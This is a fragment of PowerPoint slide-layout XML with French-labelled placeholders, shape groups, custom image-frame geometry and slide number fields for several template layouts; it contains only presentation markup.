                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFA7EE49-09EB-46F6-BBA6-D6A95A4113F9}"/>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6" name="Rectangle 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95D9B1A8-757F-4A48-9830-C50D26843366}"/>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49" name="Groupe 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CA4A7D2-D4D5-4A36-94B5-4B3D76E716A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="0"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B57D1F6-C606-4A31-9E06-3267DA10467E}"/>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1" name="Rectangle 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE8008BF-FB92-4A86-A961-5F3F0C4860A4}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="Groupe 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BCA163C-0D62-4466-8DAB-BE64F3B4EC7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="1852009"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="7045594" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="53" name="Groupe 52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{575D4B5D-A52A-4E94-9F14-2F13873E2386}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7045594" y="2588002"/>
              <a:ext cx="1885826" cy="1681996"/>
              <a:chOff x="2689543" y="1651754"/>
              <a:chExt cx="1885826" cy="1681996"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="56" name="Freeform 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E1F25AC-7448-4893-A7BC-84BB962B44F8}"/>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7" name="Rectangle 56">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8F52621-4207-4854-AF31-F46E5507A5A5}"/>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54" name="Image 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00BD0937-3D74-4BE2-8F2B-1E365FD2360A}"/>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55" name="Image 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F603E35-4B33-4AD8-8EA0-EC7A2D2D59E8}"/>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
        <p:nvSpPr>
          <p:cNvPr id="58" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B13AE18-AB3C-4779-826D-3C96717E8AF6}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308249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3 Pict + Txt B">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Espace réservé pour une image  31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27156404-7CA4-422A-A4E5-C890998BCC88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3" y="1458411"/>
            <a:ext cx="2708474" cy="4791918"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3020289"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 3176588"/>
              <a:gd name="connsiteX1" fmla="*/ 3020289 w 3020289"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 3176588"/>
              <a:gd name="connsiteX2" fmla="*/ 3020289 w 3020289"/>
              <a:gd name="connsiteY2" fmla="*/ 3176588 h 3176588"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 3020289"/>
              <a:gd name="connsiteY3" fmla="*/ 3176588 h 3176588"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3020289" h="3176588">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3020289" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3020289" y="3176588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3176588"/>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33" name="Espace réservé pour une image  31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD19386E-25FC-41D1-8DD2-02B42C49FCA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2791046" y="1458411"/>
            <a:ext cx="2708474" cy="4791918"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3020289"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 3176588"/>
              <a:gd name="connsiteX1" fmla="*/ 3020289 w 3020289"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 3176588"/>
              <a:gd name="connsiteX2" fmla="*/ 3020289 w 3020289"/>
              <a:gd name="connsiteY2" fmla="*/ 3176588 h 3176588"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 3020289"/>
              <a:gd name="connsiteY3" fmla="*/ 3176588 h 3176588"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3020289" h="3176588">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3020289" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3020289" y="3176588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3176588"/>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2" name="Espace réservé pour une image  41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{185A3294-28AC-48B0-B5CC-1B4E8F747CFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5582090" y="1467063"/>
            <a:ext cx="2727330" cy="4809328"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2727330"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 4809328"/>
              <a:gd name="connsiteX1" fmla="*/ 2727330 w 2727330"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 4809328"/>
              <a:gd name="connsiteX2" fmla="*/ 2727330 w 2727330"/>
              <a:gd name="connsiteY2" fmla="*/ 2404664 h 4809328"/>
              <a:gd name="connsiteX3" fmla="*/ 2727330 w 2727330"/>
              <a:gd name="connsiteY3" fmla="*/ 2608170 h 4809328"/>
              <a:gd name="connsiteX4" fmla="*/ 2727330 w 2727330"/>
              <a:gd name="connsiteY4" fmla="*/ 3329495 h 4809328"/>
              <a:gd name="connsiteX5" fmla="*/ 2727330 w 2727330"/>
              <a:gd name="connsiteY5" fmla="*/ 3472561 h 4809328"/>
              <a:gd name="connsiteX6" fmla="*/ 2727330 w 2727330"/>
              <a:gd name="connsiteY6" fmla="*/ 3472562 h 4809328"/>
              <a:gd name="connsiteX7" fmla="*/ 2727330 w 2727330"/>
              <a:gd name="connsiteY7" fmla="*/ 3497760 h 4809328"/>
              <a:gd name="connsiteX8" fmla="*/ 2727330 w 2727330"/>
              <a:gd name="connsiteY8" fmla="*/ 3527707 h 4809328"/>
              <a:gd name="connsiteX9" fmla="*/ 2726770 w 2727330"/>
              <a:gd name="connsiteY9" fmla="*/ 3527707 h 4809328"/>
              <a:gd name="connsiteX10" fmla="*/ 2726106 w 2727330"/>
              <a:gd name="connsiteY10" fmla="*/ 3563157 h 4809328"/>
              <a:gd name="connsiteX11" fmla="*/ 1776800 w 2727330"/>
              <a:gd name="connsiteY11" fmla="*/ 4807622 h 4809328"/>
              <a:gd name="connsiteX12" fmla="*/ 1772426 w 2727330"/>
              <a:gd name="connsiteY12" fmla="*/ 4807767 h 4809328"/>
              <a:gd name="connsiteX13" fmla="*/ 1772426 w 2727330"/>
              <a:gd name="connsiteY13" fmla="*/ 4809328 h 4809328"/>
              <a:gd name="connsiteX14" fmla="*/ 1073508 w 2727330"/>
              <a:gd name="connsiteY14" fmla="*/ 4809328 h 4809328"/>
              <a:gd name="connsiteX15" fmla="*/ 931343 w 2727330"/>
              <a:gd name="connsiteY15" fmla="*/ 4809328 h 4809328"/>
              <a:gd name="connsiteX16" fmla="*/ 0 w 2727330"/>
              <a:gd name="connsiteY16" fmla="*/ 4809328 h 4809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7330" h="4809328">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2727330" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2727330" y="2404664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2727330" y="2608170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2727330" y="3329495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2727330" y="3472561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2727330" y="3472562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2727330" y="3497760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2727330" y="3527707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2726770" y="3527707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2726106" y="3563157"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2700909" y="4234771"/>
                  <a:pt x="2289732" y="4773592"/>
                  <a:pt x="1776800" y="4807622"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1772426" y="4807767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1772426" y="4809328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1073508" y="4809328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="931343" y="4809328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4809328"/>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34" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F933F5C5-250E-4CC6-8075-DD98ECE46CB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8293687" y="1458411"/>
            <a:ext cx="3699865" cy="3046988"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">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2" name="Espace réservé du numéro de diapositive 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAE4CD4A-29C0-45EE-AFBF-DF78D6B3EE29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="Image 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E8D0AE0-A672-49FF-ACDD-589216352B4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47" name="Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9358B564-3F02-45D9-8B11-1450C66453DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="558165"/>
            <a:ext cx="4128228" cy="424732"/>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48" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FCCA431-B9DC-497D-9E0A-B087A74FB682}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525011"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4" name="Groupe 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEAEE78F-F4EC-4BB3-8B88-4342CACFCBEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7D58E51-8774-4270-AE3F-2BCB0E113F6D}"/>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5" name="Rectangle 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7E81436-FE94-4750-8AD2-45A0069E05E9}"/>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36" name="Groupe 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBA3F006-B9A9-42E3-BF99-8787C1EF987E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="0"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75113D97-C698-4CDC-98CC-FCA6737CB438}"/>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1" name="Rectangle 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{344BE79A-1758-40E9-898C-8CBF6720DC13}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="Groupe 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95457F10-D10B-413B-903B-8FADC58983AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="1852009"/>
            <a:ext cx="1885826" cy="1681996"/>
            <a:chOff x="7045594" y="2588002"/>
            <a:chExt cx="1885826" cy="1681996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="45" name="Groupe 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{539861C5-B4BB-48C7-8206-E4F11011BC64}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7045594" y="2588002"/>
              <a:ext cx="1885826" cy="1681996"/>
              <a:chOff x="2689543" y="1651754"/>
              <a:chExt cx="1885826" cy="1681996"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="Freeform 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D09B5E26-936F-491C-A766-BF0155CA1014}"/>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1" name="Rectangle 50">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7828F385-652C-44D9-832F-5D9294C44A1C}"/>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46" name="Image 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB23A1D6-90F5-4CA1-9FE5-7D603F26AF8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9" name="Image 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEF6A552-20EA-4EFB-BCA0-3C6E10F9A149}"/>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
        <p:nvSpPr>
          <p:cNvPr id="52" name="Espace réservé du texte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{341FBB72-08D9-4A0D-A3BB-36ED997A60ED}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1834853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Figures + Title + Txt (A)">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34" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F933F5C5-250E-4CC6-8075-DD98ECE46CB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5357500" y="1668111"/>
            <a:ext cx="6558875" cy="2215991"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF732074-D0EF-4870-8D8F-BAE379175E9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4700016" y="6457666"/>
            <a:ext cx="2623233"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BAE4CD4A-29C0-45EE-AFBF-DF78D6B3EE29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Image 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8CE4781-05F8-4093-B892-B6FD2D7AC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8" name="Titre 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A0F0481-0AD7-45BC-85E3-CC61DBC6B167}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558732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9" name="Espace réservé du texte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20630A20-7FA3-457D-AA5B-C4EFBC3C5F9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5587320"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20" name="Rectangle : avec coin arrondi 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11DBDF86-37EB-4D07-B140-ED21D46325A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="891251" y="687821"/>
            <a:ext cx="4198909" cy="5440101"/>
          </a:xfrm>
          <a:prstGeom prst="round1Rect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3581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t>q</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAA00DDF-307A-45D6-A4CA-EBF8B367F57C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="681328" y="274321"/>
            <a:ext cx="2156969" cy="52120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Espace réservé du texte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1A556E5-476E-4843-856D-99EDFFF27EC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="690854" y="174856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10" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D9C2CC3-F004-4897-AF41-3D0151D1D8A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
